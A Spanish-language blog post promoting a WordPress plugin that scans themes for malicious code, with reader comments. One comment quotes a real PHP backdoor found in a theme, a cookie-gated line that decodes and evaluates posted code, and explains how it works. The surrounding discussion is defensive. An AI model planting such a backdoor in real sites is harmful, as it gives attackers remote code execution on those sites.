Hoy en día no es imposible hackear un theme WordPress, si no cumples unas mínimas reglas de seguridad alguien podría insertar código en tu theme, pero no solo así, es mucho mas fácil. Porque llevado por las búsquedas puedes llegar a descargar un theme de un sitio dudoso, en vez del sitio oficial, y activarlo en tu blog sin saber que lleva incluido código malicioso.
Si tienes dudas, o quieres asegurarte, puedes comprobarlo con el plugin Theme Authenticity Checker (o TAC). Lo que hace es buscar en los archivos de tu theme instalado y tratar de detectar código malicioso. Si encuentra código de este tipo muestra la ruta al fichero del theme, el número de línea donde está y una pequeña muestra del código sospechoso.
Ahora bien ¿es seguro que ese código sea código malicioso?. Hay posibilidades de que no sea así. No es que sean muchos pero si hay algunos creadores de themes que incluyen códigos ocultos en Base64 o similares para, por ejemplo, impedir que retires los créditos al autor o sus patricinadores.
Entonces ¿como sé si el código es malware o no?. Lo mas fácil es contactar con el autor para comprobarlo, o si quieres descargar la versión «oficial» y comparar las posibles diferencias.
En cualquier caso, Theme Authenticity Checker te da pistas acerca de códigos que no deberían estar ahí, que no son normales en un theme para WordPress.
¿Te gustó este artículo? ¡Ni te imaginas lo que te estás perdiendo en YouTube!
AVISO: Esta publicación es de hace 3 años o más. Si es un código o un plugin podría no funcionar en las últimas versiones de WordPress, y si es una noticia podría estar ya obsoleta. Luego no digas que no te hemos avisado. ¡Ah! ¿te funciona? pues entonces no he dicho nada :)
Exelente Fernando, así nos podemos asegurar de que estamos usando un theme bueno, por así decirlo, sin ningún tipo de modificaciones raras.
Muchas gracias por el plugin.
Nos vemos
Me fascino esta herramienta… Por que desde ella tambien modifico los creditos y unos cuantos enlaces publicitarios… Gracias por haber posteado este plugin tan excelente…. Chao Ayudawordpress.com
Pues en mi teme había un código muy sospechoso:
if($_COOKIE['daccaf48560b651c']=="931f9058bd933379"){ eval(base64_decode($_POST['file'])); exit; }
Que sería algo como si la cookie es igual 931f9058bd933379 puedes recibir por post la variable file, lo descodificas de la base 64 y lo ejecutas.
Ya lo he borrado porque creo que con esto puedes enviar un fichero y ejecutar las ordenes en php….
Ya investigaré si ese código estaba ahí desde un principio.
Excelente plugin!.
Siempre que veo que algún theme contiene código ofuscado en el footer.php, lo que siempre hago es cambiar de theme o pedir ayuda para que me lo ofusquen.
Saludos!
Excelente recomendación. Hace algunos días tuve un problema de estos (por estar usando una versión vieja de Wordpress) y realmente fue un problema ya que Google consideró mi sitio como presunto de ataques.
Lo mejor es pagar para utilizar temas "premium". Uso temas muy bonitos, con funcionalidades interesantes y que me ofrecen actualizaciones de seguridad.